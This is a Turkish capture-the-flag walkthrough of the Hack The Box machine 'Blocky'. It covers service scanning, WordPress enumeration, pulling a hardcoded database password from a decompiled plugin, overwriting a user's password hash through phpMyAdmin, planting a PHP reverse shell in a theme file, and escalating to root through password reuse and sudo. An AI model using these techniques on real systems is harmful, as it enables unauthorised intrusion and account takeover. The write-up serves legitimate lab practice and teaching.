| Makine Adı | Seviye | OS | Logo |
|---|---|---|---|
| Blocky - HTB | Kolay | Linux |
Walkthrough
Nmap taraması ile başlayalım.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-29 14:08 EDT
Nmap scan report for 10.10.10.37
Host is up (0.070s latency).
Not shown: 65530 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5a
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
| 256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
|_ 256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.8
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: BlockyCraft – Under Construction!
8192/tcp closed sophos
25565/tcp open minecraft Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)
Device type: general purpose|WAP|specialized|storage-misc|broadband router|printer
Running (JUST GUESSING): Linux 3.X|4.X|5.X|2.6.X (94%), Asus embedded (90%), Crestron 2-Series (89%), HP embedded (89%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel cpe:/h:asus:rt-ac66u cpe:/o:crestron:2_series cpe:/h:hp:p2000_g3 cpe:/o:linux:linux_kernel:5.1 cpe:/o:linux:linux_kernel:2.6
Aggressive OS guesses: Linux 3.10 - 4.11 (94%), Linux 3.13 (94%), Linux 3.13 or 4.2 (94%), Linux 4.2 (94%), Linux 4.4 (94%), Linux 3.16 (92%), Linux 3.16 - 4.6 (92%), Linux 3.12 (91%), Linux 3.2 - 4.9 (91%), Linux 3.8 - 3.11 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 70.06 ms 10.10.14.1
2 70.71 ms 10.10.10.37
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 117.73 seconds
nmap çıktılarındaki versionları araştırdım ancak public bir exploit yoktu bunun üzerine 80'i keşfe başladım. Bir wordpress vardı ve wpscan ile kullanıcı tespit ettim. Daha sonrasında bu kullanıcıya bruteforce denedim ancak başarılı olamadım. Aynı başarısızlığı ilgili kullanıcıyla ftp ve ssh'da da yaşadım.
┌──(root💀kali)-[~/oscp/htb/Blocky]
└─# wpscan --url http://10.10.10.37/ -e vp,vt,cb,dbe,u,m
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.17
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]n
[+] URL: http://10.10.10.37/ [10.10.10.37]
[+] Started: Thu Jul 29 14:08:18 2021
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://10.10.10.37/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://10.10.10.37/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://10.10.10.37/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://10.10.10.37/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.8 identified (Insecure, released on 2017-06-08).
| Found By: Rss Generator (Passive Detection)
| - http://10.10.10.37/index.php/feed/, <generator>https://wordpress.org/?v=4.8</generator>
| - http://10.10.10.37/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.8</generator>
[+] WordPress theme in use: twentyseventeen
| Location: http://10.10.10.37/wp-content/themes/twentyseventeen/
| Last Updated: 2021-04-27T00:00:00.000Z
| Readme: http://10.10.10.37/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 2.7
| Style URL: http://10.10.10.37/wp-content/themes/twentyseventeen/style.css?ver=4.8
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://10.10.10.37/wp-content/themes/twentyseventeen/style.css?ver=4.8, Match: 'Version: 1.3'
[+] Enumerating Vulnerable Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:00:07 <==============================================================================================================================================================> (355 / 355) 100.00% Time: 00:00:07
[+] Checking Theme Versions (via Passive and Aggressive Methods)
[i] No themes Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:02 <===============================================================================================================================================================> (137 / 137) 100.00% Time: 00:00:02
[i] No Config Backups Found.
[+] Enumerating DB Exports (via Passive and Aggressive Methods)
Checking DB Exports - Time: 00:00:01 <=====================================================================================================================================================================> (71 / 71) 100.00% Time: 00:00:01
[i] No DB Exports Found.
[+] Enumerating Medias (via Passive and Aggressive Methods) (Permalink setting must be set to "Plain" for those to be detected)
Brute Forcing Attachment IDs - Time: 00:00:02 <==========================================================================================================================================================> (100 / 100) 100.00% Time: 00:00:02
[i] No Medias Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <================================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] notch
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://10.10.10.37/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] Notch
| Found By: Rss Generator (Passive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Thu Jul 29 14:08:38 2021
[+] Requests Done: 722
[+] Cached Requests: 10
[+] Data Sent: 182.064 KB
[+] Data Received: 660.597 KB
[+] Memory used: 239.707 MB
[+] Elapsed time: 00:00:19
Dizin ve dosya keşfinde aşağıdaki sonuçları aldım.
┌──(root💀kali)-[~/oscp/htb/Blocky]
└─# gobuster dir --url http://10.10.10.37 --add-slash --expanded --follow-redirect --status-codes-blacklist 404 --extensions php,sh,txt,sql,conf,php5,zip,rar --timeout 20s -t 20 -w /usr/share/wordlists/dirb/big.txt --no-error | tee gobuster1
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.37
[+] Method: GET
[+] Threads: 20
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: txt,sql,conf,php5,zip,rar,php,sh
[+] Add Slash: true
[+] Follow Redirect: true
[+] Expanded: true
[+] Timeout: 20s
===============================================================
2021/07/29 14:24:33 Starting gobuster in directory enumeration mode
===============================================================
http://10.10.10.37/.htaccess.zip (Status: 403) [Size: 299]
http://10.10.10.37/.htpasswd/ (Status: 403) [Size: 296]
http://10.10.10.37/.htaccess/ (Status: 403) [Size: 296]
http://10.10.10.37/.htaccess.rar (Status: 403) [Size: 299]
http://10.10.10.37/.htaccess.php (Status: 403) [Size: 299]
http://10.10.10.37/.htaccess.txt (Status: 403) [Size: 299]
http://10.10.10.37/.htaccess.conf (Status: 403) [Size: 300]
http://10.10.10.37/.htpasswd.zip (Status: 403) [Size: 299]
http://10.10.10.37/.htaccess.sh (Status: 403) [Size: 298]
http://10.10.10.37/.htpasswd.php (Status: 403) [Size: 299]
http://10.10.10.37/.htaccess.sql (Status: 403) [Size: 299]
http://10.10.10.37/.htpasswd.sql (Status: 403) [Size: 299]
http://10.10.10.37/.htpasswd.conf (Status: 403) [Size: 300]
http://10.10.10.37/.htpasswd.php5 (Status: 403) [Size: 300]
http://10.10.10.37/.htpasswd.rar (Status: 403) [Size: 299]
http://10.10.10.37/.htaccess.php5 (Status: 403) [Size: 300]
http://10.10.10.37/.htpasswd.sh (Status: 403) [Size: 298]
http://10.10.10.37/.htpasswd.txt (Status: 403) [Size: 299]
http://10.10.10.37/icons/ (Status: 403) [Size: 292]
http://10.10.10.37/index.php (Status: 200) [Size: 52256]
http://10.10.10.37/javascript/ (Status: 403) [Size: 297]
http://10.10.10.37/license.txt (Status: 200) [Size: 19935]
http://10.10.10.37/phpmyadmin/ (Status: 200) [Size: 10328]
http://10.10.10.37/plugins/ (Status: 200) [Size: 745]
http://10.10.10.37/server-status/ (Status: 403) [Size: 300]
http://10.10.10.37/wiki/ (Status: 200) [Size: 380]
http://10.10.10.37/wp-content/ (Status: 200) [Size: 0]
http://10.10.10.37/wp-config.php (Status: 200) [Size: 0]
http://10.10.10.37/wp-includes/ (Status: 200) [Size: 40839]
http://10.10.10.37/wp-admin/ (Status: 200) [Size: 2402]
http://10.10.10.37/wp-login.php (Status: 200) [Size: 2402]
http://10.10.10.37/wp-trackback.php (Status: 200) [Size: 135]
http://10.10.10.37/xmlrpc.php (Status: 405) [Size: 42]
===============================================================
2021/07/29 14:41:58 Finished
===============================================================
http://10.10.10.37/wiki/ sayfasında pluginlerden bahsediyordu. Bunun üzerine http://10.10.10.37/plugins/ sayfasına gittim ve jar dosyaları buldum. Bu arada andorid app sızma testlerine bayılırım.
Java kodlarına ulaşmak için aşağıdaki adımları izledim.
──(root💀kali)-[~/oscp/htb/Blocky]
└─# wget https://github.com/java-decompiler/jd-gui/releases/download/v1.6.6/jd-gui-1.6.6.jar
--2021-07-29 14:44:34-- https://github.com/java-decompiler/jd-gui/releases/download/v1.6.6/jd-gui-1.6.6.jar
Resolving github.com (github.com)... 140.82.121.3
Connecting to github.com (github.com)|140.82.121.3|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://github-releases.githubusercontent.com/32844456/012e1e80-272e-11ea-9941-5a32c9f59220?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20210729%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20210729T184433Z&X-Amz-Expires=300&X-Amz-Signature=5c5fe4d76ef0801b9ea52003c5f8a659722fad297a9660e9e5423b2671b8c88d&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=32844456&response-content-disposition=attachment%3B%20filename%3Djd-gui-1.6.6.jar&response-content-type=application%2Foctet-stream [following]
--2021-07-29 14:44:35-- https://github-releases.githubusercontent.com/32844456/012e1e80-272e-11ea-9941-5a32c9f59220?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20210729%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20210729T184433Z&X-Amz-Expires=300&X-Amz-Signature=5c5fe4d76ef0801b9ea52003c5f8a659722fad297a9660e9e5423b2671b8c88d&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=32844456&response-content-disposition=attachment%3B%20filename%3Djd-gui-1.6.6.jar&response-content-type=application%2Foctet-stream
Resolving github-releases.githubusercontent.com (github-releases.githubusercontent.com)... 185.199.110.154, 185.199.111.154, 185.199.108.154, ...
Connecting to github-releases.githubusercontent.com (github-releases.githubusercontent.com)|185.199.110.154|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3238491 (3.1M) [application/octet-stream]
Saving to: ‘jd-gui-1.6.6.jar’
jd-gui-1.6.6.jar 100%[=========================================================================================================================================>] 3.09M 511KB/s in 5.0s
2021-07-29 14:44:40 (628 KB/s) - ‘jd-gui-1.6.6.jar’ saved [3238491/3238491]
┌──(root💀kali)-[~/oscp/htb/Blocky]
└─# java -jar jd-gui-1.6.6.jar
Artık java kodlarına ulaştım. BlockyCore.jar uygulasını açtığımda kabak gibi şifreye ukaştım. Kodlar aşağıda...
package com.myfirstplugin;
public class BlockyCore {
public String sqlHost = "localhost";
public String sqlUser = "root";
public String sqlPass = "8YsqfCTnvxAUeduzjNSXe22";
public void onServerStart() {}
public void onServerStop() {}
public void onPlayerJoin() {
sendMessage("TODO get username", "Welcome to the BlockyCraft!!!!!!!");
}
public void sendMessage(String username, String message) {}
}
gobuster çıktılarında phpmyadmin bulmuştum.Giriş yaptım ve wordpress'deki kullanıcının hash;'ini ilk başta kırmaya çalıştım, başarısız olunca hash'i kopyaladım ve kendime https://www.useotools.com/wordpress-password-hash-generator/output adresinden değeri kuday olan bir hash ürettim.
$P$BymHlBZYz9WBhKzdh6RVBHDjFAEtgz0(kuday)
WordPress uygulamasına giriş yapınca footer.php kısmına reverse shell gömdüm ve shell aldım.
┌──(root💀kali)-[~/oscp/htb/Blocky]
└─# wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
--2021-07-29 14:49:45-- https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.109.133, 185.199.110.133, 185.199.111.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.109.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5491 (5.4K) [text/plain]
Saving to: ‘php-reverse-shell.php’
php-reverse-shell.php 100%[=========================================================================================================================================>] 5.36K --.-KB/s in 0.001s
2021-07-29 14:49:45 (8.03 MB/s) - ‘php-reverse-shell.php’ saved [5491/5491]
┌──(root💀kali)-[~/oscp/htb/Blocky]
└─# nc -lvp 1234
listening on [any] 1234 ...
10.10.10.37: inverse host lookup failed: Unknown host
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.37] 46882
Linux Blocky 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
13:52:43 up 47 min, 0 users, load average: 0.09, 3.38, 6.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python -c 'import pty;
> pty.spawn("/bin/bash")'
/bin/sh: 2: python: not found
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@Blocky:/$
İlk flagi okumak istedim ancak hata ile karşılaştım. Bunun üzerine elde etmiş olduğum ilk parolayı notch kullanıcısı için denedim.
www-data@Blocky:/home/notch$ cat user.txt
cat user.txt
cat: user.txt: Permission denied
www-data@Blocky:/home/notch$ ls -al
ls -al
total 48
drwxr-xr-x 5 notch notch 4096 Jul 2 2017 .
drwxr-xr-x 3 root root 4096 Jul 2 2017 ..
-rw------- 1 notch notch 1 Dec 24 2017 .bash_history
-rw-r--r-- 1 notch notch 220 Jul 2 2017 .bash_logout
-rw-r--r-- 1 notch notch 3771 Jul 2 2017 .bashrc
drwx------ 2 notch notch 4096 Jul 2 2017 .cache
-rw------- 1 root root 369 Jul 2 2017 .mysql_history
drwxrwxr-x 2 notch notch 4096 Jul 2 2017 .nano
-rw-r--r-- 1 notch notch 655 Jul 2 2017 .profile
-rw-rw-r-- 1 notch notch 66 Jul 2 2017 .selected_editor
-rw-r--r-- 1 notch notch 0 Jul 2 2017 .sudo_as_admin_successful
drwxrwxr-x 7 notch notch 4096 Jul 2 2017 minecraft
-r-------- 1 notch notch 32 Jul 2 2017 user.txt
www-data@Blocky:/home/notch$ su notch
su notch
Password: 8YsqfCTnvxAUeduzjNSXe22
notch@Blocky:~$
Bu esnada ssh ile devam ettim.
─(root💀kali)-[~/oscp/htb/Blocky]
└─# ssh [email protected] 130 ⨯
The authenticity of host '10.10.10.37 (10.10.10.37)' can't be established.
ECDSA key fingerprint is SHA256:lg0igJ5ScjVO6jNwCH/OmEjdeO2+fx+MQhV/ne2i900.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.37' (ECDSA) to the list of known hosts.
[email protected]'s password:
Permission denied, please try again.
[email protected]'s password:
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
7 packages can be updated.
7 updates are security updates.
Last login: Sun Dec 24 09:34:35 2017
notch@Blocky:~$ ls
minecraft user.txt
notch@Blocky:~$ cat user.txt
59fe***************************
notch@Blocky:~$
Daha sonrasında kolay bir şekilde root oldum.
notch@Blocky:~$ sudo -l
[sudo] password for notch:
Matching Defaults entries for notch on Blocky:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User notch may run the following commands on Blocky:
(ALL : ALL) ALL
notch@Blocky:~$ sudo su
root@Blocky:/home/notch# id
uid=0(root) gid=0(root) groups=0(root)
root@Blocky:/home/notch# cd /root/
root@Blocky:~# ls
root.txt
root@Blocky:~# cat root.txt
0a96*********************************
root@Blocky:~#
İlk Yorumu Siz Yapın